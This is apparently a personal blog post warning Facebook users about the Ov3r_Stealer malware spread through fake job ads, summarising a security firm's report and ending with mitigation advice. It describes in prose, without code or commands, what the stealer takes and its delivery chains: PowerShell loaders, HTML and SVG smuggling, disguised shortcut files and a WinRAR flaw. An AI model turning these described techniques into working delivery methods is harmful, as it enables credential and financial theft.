Have you Noticed Job’s Adds Roaming Around Facebook; Beaware of Ov3r_Stealer’ Malware

Recently as I was going through my Facebook , I noticed that lot of job advertisement for various position mainly account manager. As I applied they send back queries asking for mobile number and What’s Up messages.

Researchers first discovered the stealer in early December.

It was being spread via a Facebook job advertisement for an account manager position, they revealed in a blog post and report published this week. Later, they discovered that the actors behind the malware also use Facebook-based scams — including the creation of fake accounts to spread the malware.

The Novel stealer malware called “Ov3r_Stealer & How does it Work

A novel stealer malware called “Ov3r_Stealer” is making the rounds on Facebook, spreading through job ads and accounts on the social media platform, and using various execution methods to steal reams of data from unwitting victims.

The malware by design exfiltrates specific types of data such as geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information, according to researchers from Trustwave SpiderLabs.

  • It sends the info a Telegram channel being monitored by the threat actors.
  • Threat actors behind the malware also use Facebook-based scams — including the creation of fake accounts — to spread the malware.
  • The malware works through  weaponized links delivered through the ad lead to a malicious Discord content-delivery URL, which executed the stealer using a PowerShell script masquerading as a Windows Control Panel (CPL) binary to download the malware, in the form of three files from a GitHub site.
  • Research finds out that Ov3r_Stealer is having several execution methods.
  • In addition to the PowerShell vector, Ov3r_Stealer also can be executed on a victim’s machine via HTML smuggling, SVG image smuggling, and .LNK shortcut files masquerading as innocuous text documents.

Leading to RabbitHole

Once researchers followed the stolen data to Telegram, they found a rather complex origin story behind Ov3r_Stealer, as the malware appears to have a range of threat actors behind it who conspire via multiple communication channels and platforms.

Specifically, the researchers uncovered various pseudonyms, communication channels, and repositories for the stolen data that hold clues to who’s behind it and how they work.

“Aliases such as ‘Liu Kong,’ ‘MR Meta,’ MeoBlackA, and ‘John Macollan’ were found in groups like ‘Pwn3rzs Chat,’ ‘Golden Dragon Lounge,’ ‘Data Pro,’ and ‘KGB Forums,’ where many ‘researchers,’ threat actors, and curious folk gather, meetup, and exchange hacks, malware, and cracked software daily,” according to the report.

It’s unknown exactly how attackers use the data once it’s stolen, but possibilities including selling it or using it for phishing.

Ov3r_Stealer’s Various Execution Strategies

As mentioned, once a victim is compromised, the stealer uses several unique execution methods; the researchers observed one and gleaned a few others from sample code.

Another method indicated by sample data is through HTML smuggling, which uses a weaponized HTML file, CustomCursor.html, to load the CustomCursor.zip file that includes the malware files.

A third execution method is through a shortcut file (.LNK). The victim is presented with a file masquerading as a typical text file called Attitude_Reports.txt, located within a zip archive. The actual file within the zip archive, however, is a malicious .LNK file called Attitude_Reports.txt.lnk. Once opened, it will redirect the victim to the GitHub repository, as the CPL loader does, to download the actual payload.

Attackers also use a technique called SVG smuggling to execute the file in a method that exploits the WinRAR Code Execution Vulnerability (CVE-2023-38831).

A Malware Poised to Go Big

Researchers believe it remains under continual development and continues to pose an existing threat and in future come up big. They included a comprehensive list of indicators of compromise (IoCs) in their report to help organizations identify the malware in their environment.

“As Ov3r_Stealer has been actively developed with multiple loader techniques, we may see this one eventually be sold or used in other campaigns in the future,” according to the report.

What Orgs must do?

Organizations also should use regular application and service audits and baselining, as well as practice up-to-date application patching to mitigate threats, the researchers added.

Further, they should continuously hunt threats throughout their environments to pick up undetected compromises before they have time to do damage, they added.

(Image courtesy: Geeksadvice)

Leave a Reply

Your email address will not be published. Required fields are marked *